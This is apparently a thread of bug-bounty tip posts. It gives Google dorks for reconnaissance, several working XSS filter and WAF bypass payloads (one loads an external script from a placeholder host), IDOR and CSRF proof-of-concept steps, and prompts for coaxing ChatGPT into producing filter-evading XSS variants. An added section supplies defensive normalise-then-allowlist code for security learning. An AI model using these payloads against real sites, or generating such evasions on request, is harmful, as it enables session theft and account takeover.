Google Dork - API Endpoints ⚙️
site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
Find juicy API Endpoints for further testing 🎯
Google Dorks - Part 5
Other search engines:
Example:
site:tesla[.]com -site:ir.tesla[.]com
Find hidden endpoints not on Google
#recon
#bugbountytips
#seo
#infosec
XSS-Bypass Anatomy
Final payload after working hours on a bug bounty target w/ both XSS filters & WAF:
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
Tips for getting into bug bounty and web pentesting:
1. Don't worry about certs, just hack or build something
2. @PortSwigger Web Security Academy:
3. Hack on a VDP until you get your first vuln
4. Build a tool or web app
#bugbountytips
#infosec
XSS Bypass - slice + external script
Payload:
<svg onload=eval(location.hash.slice(1))>
Put this at the end of the URL:
#with(document)body.appendChild(createElement('script')).src='//domain'
More from @brutelogic:
#xss
#bugbountytips
#hacking
#infosec
XSS Bypass - javascript: URI
If you can inject these tags:
<a> <iframe> <object> <embed>
But, "javascript:" & "data:" are blocked
Try these obfuscation techniques:
java%00script:
java%0Ascript:
java&tab;script:
Example:
<a href="java%0Ascript:al%0Aert()">click</a>
Google Dork - Find Bug Bounty programs:
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" -inurl:news -site:*.de
Last two bits reduce noise, but you can remove them.
#bugbountytips
#bugbounty
#infosec
XSS filter bypass:
<embed src="javascript%26%63%6f%6c%6f%6e%3balert()">
The URL-encoded portion is the HTML entity for colon: &colon;
#bugbountytips
#bugbounty
#XSS
XSS Fuzzing w/ ChatGPT
Prompt #1:
explain this: javascript:alert()
Prompt #2:
show me alternatives
Customize Bypass:
list 10 that don't use the word "alert" intact
XSS on a login page while stuck in an input tag with <> filtered. Final Payload:
" formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src=""
Also gets around a "javascript" and "alert" blacklist with HTML entity Tab obfuscation.
#BugBountyTips
#bugbounty
#XSS
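The javascript: URI bypasses in this thread (newline inside the scheme, &colon; standing in for the colon, &Tab; inside the scheme and the function name) all slip past a filter that searches the raw attribute value for the literal string, because the browser entity-decodes the attribute and then strips tab, CR and LF before it parses the scheme. Added example, not from the original thread: the defensive counterpart, a normalise-then-allowlist check that treats the value the way the browser will, shown beside the naive substring check it replaces. The function names and the NUL stripping are my own choices, and the sample inputs are the thread's payloads as the server sees them after request percent-decoding.

```python
import html
import re
from typing import Dict, Optional, Tuple

# Only these schemes are accepted for a user-supplied link (allowlist).
SAFE_SCHEMES = {"http", "https", "mailto"}

def naive_is_blocked(attr_value: str) -> bool:
    """The blocklist the payloads above are built to slip past: a substring
    search for the literal scheme in the raw, undecoded attribute value."""
    lowered = attr_value.lower()
    return "javascript:" in lowered or "data:" in lowered

def browser_normalize(attr_value: str) -> str:
    """Model what the browser does before it reads the scheme: decode HTML
    character references (&Tab; &colon; ...), strip leading/trailing C0
    controls and spaces, then delete tab/LF/CR anywhere (WHATWG URL parser).
    NUL is deleted too: a defensive choice, not something the spec requires."""
    s = html.unescape(attr_value)
    s = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", s)
    return re.sub(r"[\x00\t\n\r]", "", s)

def scheme_of(url: str) -> Optional[str]:
    """Lower-cased scheme, or None for a relative URL."""
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", url)
    return m.group(1).lower() if m else None

def is_safe_link(attr_value: str) -> bool:
    """Allowlist check on the normalised value; a relative URL has no scheme."""
    scheme = scheme_of(browser_normalize(attr_value))
    return scheme is None or scheme in SAFE_SCHEMES

# Constructed samples: the thread's payloads as the server receives them
# after request percent-decoding, i.e. the bytes that land in the attribute.
SAMPLES = {
    "newline_in_scheme": "java\nscript:al\nert()",       # java%0Ascript:al%0Aert()
    "tab_entity":        "java&Tab;script:ale&Tab;rt()",  # java%26Tab%3bscript:...
    "colon_entity":      "javascript&colon;alert()",      # javascript%26%63%6f%6c%6f%6e%3b...
    "null_in_scheme":    "java\x00script:alert()",        # java%00script:
    "benign":            "https://example.com/profile",
}

def evaluate() -> Dict[str, Tuple[bool, bool]]:
    """Per sample: (caught by the naive blocklist?, accepted by the allowlist?)."""
    return {n: (naive_is_blocked(v), is_safe_link(v)) for n, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, (blocked, safe) in evaluate().items():
        print(f"{name:18} naive_blocked={blocked!s:5} allowlist_accepts={safe}")
```

Every obfuscated sample reports naive_blocked=False and allowlist_accepts=False, which is the point: the blocklist never sees the decoded scheme, the allowlist does.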
Weird IDOR I've never seen before:
1. User 1 updates at /api/account
2. User 2 registers at /api/register
3. Change userID for /api/register from User 2 -> User 1
🤯 IDOR succeeds - User 2 changes account details of User 1 via registration endpoint
#bugbountytips
#infosec
New blog post: Hack rich text editors for XSS
This is the method I use anytime I see a rich text editor embedded in a bug bounty or pentesting target.
#xss
#bugbountytips
#infosec
#hacking
P1 IDORs & BAC w/ Auth Analyzer Burp Extension:
1. Copy/paste session cookies from different users
2. Start Analyzer
3. Do things in browser w/ user 1
4. Look at SAME responses for any requests that user 2 can do that should only be accessible for user 1
#bugbountytips
#hacking
Google Dork - Unlisted Bug Bounty Programs 🐛
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" reward -site:hackerone[.]com
Some programs don't want to be listed in the directory; you can only access them directly via their site.
Google Dorks - OneDrive, Firebase, and JFrog Artifactory:
site: "example[.]com"
site: "example[.]com"
site: "example[.]com"
Find sensitive data and company accounts
#recon
#bugbountytips
#infosec
#seo
Easy CSRF and POST XSS PoC:
1. "Generate CSRF PoC" in Burp
2. Copy HTML
3. Paste into Decoder
4. Encode as Base64 and copy output
5. Paste it to the end of this URI:
data:text/html;base64,<Base64 here>
6. Open the link to activate CSRF
#bugbountytips
#csrf
#xss
#infosec
🚀 Ready to level up your Burp Suite game? Check out my latest Medium article packed with tips & tricks to supercharge your workflow!
From filtering proxy history to must-have extensions, we've got you covered!
🌐🔥 Read & share:
#bugbountytips